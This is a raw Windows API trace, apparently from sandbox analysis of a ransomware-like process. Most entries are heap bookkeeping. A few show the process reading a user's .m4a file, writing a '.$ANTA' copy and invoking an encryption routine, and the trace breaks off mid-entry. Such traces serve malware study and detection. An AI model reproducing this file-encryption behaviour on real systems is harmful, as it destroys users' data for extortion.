[0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0110.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0110.583] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0110.583] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0110.637] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0110.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0110.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0110.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0110.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0110.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0110.637] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Juj1PsS7vx.m4a" (normalized: "c:\\users\\fd1hvy\\music\\juj1pss7vx.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0110.638] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.638] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0110.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0110.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0110.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0110.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0110.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0110.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.638] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0110.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0110.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0110.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0110.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0110.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0110.638] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0110.638] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0110.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0110.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0110.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0110.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0110.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0110.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0110.640] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0110.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0110.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0110.641] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Juj1PsS7vx.m4a.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\juj1pss7vx.m4a.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0110.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0110.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0110.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0110.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0110.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0110.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.641] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0110.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0110.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0110.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0110.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0110.642] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0110.642] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0110.642] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0110.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0110.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e05020 [0110.646] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0110.646] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0110.649] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x2e0b, lpOverlapped=0x0) returned 1 [0110.649] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0110.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0110.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0110.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0110.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12e0b) returned 0x4516010 [0110.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0110.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0110.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0110.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0110.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12e0b) returned 0x4528e28 [0110.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0110.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.654] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0110.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0110.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12e0b) returned 0x4516010 [0110.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0110.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0110.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0110.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.655] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0110.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0110.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0110.655] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0110.655] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0110.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0110.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0110.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12e0b) returned 0x4516010 [0110.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23f0 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2390 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0110.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca058 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0110.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12e0b) returned 0x499a008 [0110.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0110.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0110.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0110.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0110.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0110.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0110.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0110.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0110.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0110.659] RtlAllocateHeap 